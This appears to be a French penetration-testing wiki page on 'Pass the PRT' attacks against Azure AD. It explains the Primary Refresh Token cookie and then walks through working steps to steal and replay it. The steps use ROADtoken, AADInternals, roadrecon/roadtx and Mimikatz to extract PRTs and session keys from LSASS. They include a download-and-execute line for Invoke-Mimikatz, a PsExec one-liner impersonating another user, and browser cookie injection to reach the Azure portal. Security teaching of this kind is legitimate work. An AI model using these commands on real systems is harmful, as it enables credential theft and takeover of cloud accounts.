Az - Pass the PRT

Qu'est-ce qu'un PRT

Vérifiez si vous avez un PRT

Dsregcmd.exe /status

Dans la section État SSO, vous devriez voir AzureAdPrt réglé sur OUI.

Dans le même résultat, vous pouvez également voir si le dispositif est joint à Azure (dans le champ AzureAdJoined):

Cookie PRT

Le cookie PRT est en fait appelé x-ms-RefreshTokenCredential et c'est un JSON Web Token (JWT). Un JWT contient 3 parties, le header, le payload et la signature, divisées par un . et toutes encodées en base64 sûr pour les URL. Un cookie PRT typique contient l'en-tête et le corps suivants :

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Le Primary Refresh Token (PRT) réel est encapsulé dans le refresh_token, qui est chiffré par une clé sous le contrôle d'Azure AD, rendant son contenu opaque et indéchiffrable pour nous. Le champ is_primary signifie l'encapsulation du primary refresh token dans ce token. Pour s'assurer que le cookie reste lié à la session de connexion spécifique pour laquelle il était destiné, le request_nonce est transmis depuis la page logon.microsoftonline.com.

Flux de cookie PRT utilisant TPM

Le processus LSASS enverra au TPM le KDF context, et le TPM utilisera la session key (récupérée lorsque l'appareil a été enregistré dans AzureAD et stockée dans le TPM) et le contexte précédent pour dériver une clé, et cette clé dérivée est utilisée pour signer le cookie PRT (JWT).

Le KDF context est un nonce d'AzureAD et le PRT créant un JWT mélangé avec un context (octets aléatoires).

Par conséquent, même si le PRT ne peut pas être extrait car il est situé à l'intérieur du TPM, il est possible d'abuser de LSASS pour demander des clés dérivées de nouveaux contextes et utiliser les clés générées pour signer des cookies.

Scénarios d'abus de PRT

En tant qu'utilisateur régulier, il est possible de demander l'utilisation du PRT en demandant à LSASS des données SSO. Cela peut être fait comme les applications natives qui demandent des tokens au Web Account Manager (token broker). WAM passe la demande à LSASS, qui demande des tokens en utilisant une assertion PRT signée. Ou cela peut être fait avec des flux basés sur le navigateur (web) où un cookie PRT est utilisé comme en-tête pour authentifier les demandes aux pages de connexion Azure AS.

En tant que SYSTEM, vous pourriez voler le PRT s'il n'est pas protégé par TPM ou interagir avec les clés PRT dans LSASS en utilisant des API cryptographiques.

Exemples d'attaque Pass-the-PRT

Attaque - ROADtoken

Pour plus d'informations sur cette méthode consultez ce post. ROADtoken exécutera BrowserCore.exe depuis le bon répertoire et l'utilisera pour obtenir un cookie PRT. Ce cookie peut ensuite être utilisé avec ROADtools pour s'authentifier et obtenir un refresh token persistant.

Pour générer un cookie PRT valide, la première chose dont vous avez besoin est un nonce. Vous pouvez obtenir cela avec :

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Ou en utilisant roadrecon :

roadrecon auth prt-init

Ensuite, vous pouvez utiliser roadtoken pour obtenir un nouveau PRT (exécutez l'outil à partir d'un processus de l'utilisateur à attaquer) :

.\ROADtoken.exe <nonce>

Comme oneliner:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Ensuite, vous pouvez utiliser le cookie généré pour générer des jetons afin de vous connecter en utilisant Azure AD Graph ou Microsoft Graph :

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Attack - Using roadrecon

Attack - Using AADInternals and a leaked PRT

Get-AADIntUserPRTToken obtient le jeton PRT de l'utilisateur à partir de l'ordinateur joint à Azure AD ou Hybrid. Utilise BrowserCore.exe pour obtenir le jeton PRT.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Ou si vous avez les valeurs de Mimikatz, vous pouvez également utiliser AADInternals pour générer un jeton :

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Allez sur https://login.microsoftonline.com, supprimez tous les cookies pour login.microsoftonline.com et entrez un nouveau cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Ensuite, allez sur https://portal.azure.com

Attaque - Mimikatz

Étapes

1. Le PRT (Primary Refresh Token) est extrait de LSASS (Local Security Authority Subsystem Service) et stocké pour une utilisation ultérieure.

2. La clé de session est extraite ensuite. Étant donné que cette clé est initialement émise puis ré-encryptée par l'appareil local, elle nécessite une décryption à l'aide d'une clé maître DPAPI. Des informations détaillées sur DPAPI (Data Protection API) peuvent être trouvées dans ces ressources : HackTricks et pour comprendre son application, consultez Pass-the-cookie attack.

3. Après la décryption de la clé de session, la clé dérivée et le contexte pour le PRT sont obtenus. Ceux-ci sont cruciaux pour la création du cookie PRT. Plus précisément, la clé dérivée est utilisée pour signer le JWT (JSON Web Token) qui constitue le cookie. Une explication complète de ce processus a été fournie par Dirk-jan, accessible ici.

Vous pouvez trouver une explication approfondie du processus effectué pour extraire ces détails ici : https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

Vous pouvez utiliser mimikatz pour extraire le PRT :

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Copiez la partie étiquetée Prt et enregistrez-la. Extrayez également la clé de session (la KeyValue du champ ProofOfPossesionKey) que vous pouvez voir surlignée ci-dessous. Celle-ci est chiffrée et nous devrons utiliser nos clés maîtresses DPAPI pour la déchiffrer.

Pour décrypter la clé de session, vous devez élever vos privilèges à SYSTEM pour exécuter sous le contexte de l'ordinateur afin de pouvoir utiliser la clé maîtresse DPAPI pour la déchiffrer. Vous pouvez utiliser les commandes suivantes pour ce faire :

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Option 1 - Full Mimikatz

• Maintenant, vous voulez copier à la fois la valeur du Context :

• Et la valeur de la derived key :

• Enfin, vous pouvez utiliser toutes ces informations pour générer des cookies PRT :

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• Allez sur https://login.microsoftonline.com, supprimez tous les cookies pour login.microsoftonline.com et entrez un nouveau cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Ensuite, allez sur https://portal.azure.com

Option 2 - roadrecon utilisant PRT

• Renouvelez d'abord le PRT, ce qui le sauvegardera dans roadtx.prt:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Maintenant, nous pouvons demander des jetons en utilisant le navigateur interactif avec roadtx browserprtauth. Si nous utilisons la commande roadtx describe, nous voyons que le jeton d'accès inclut une revendication MFA car le PRT que j'ai utilisé dans ce cas avait également une revendication MFA.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Option 3 - roadrecon utilisant des clés dérivées

Ayant le contexte et la clé dérivée extraits par mimikatz, il est possible d'utiliser roadrecon pour générer un nouveau cookie signé avec :

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Références

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g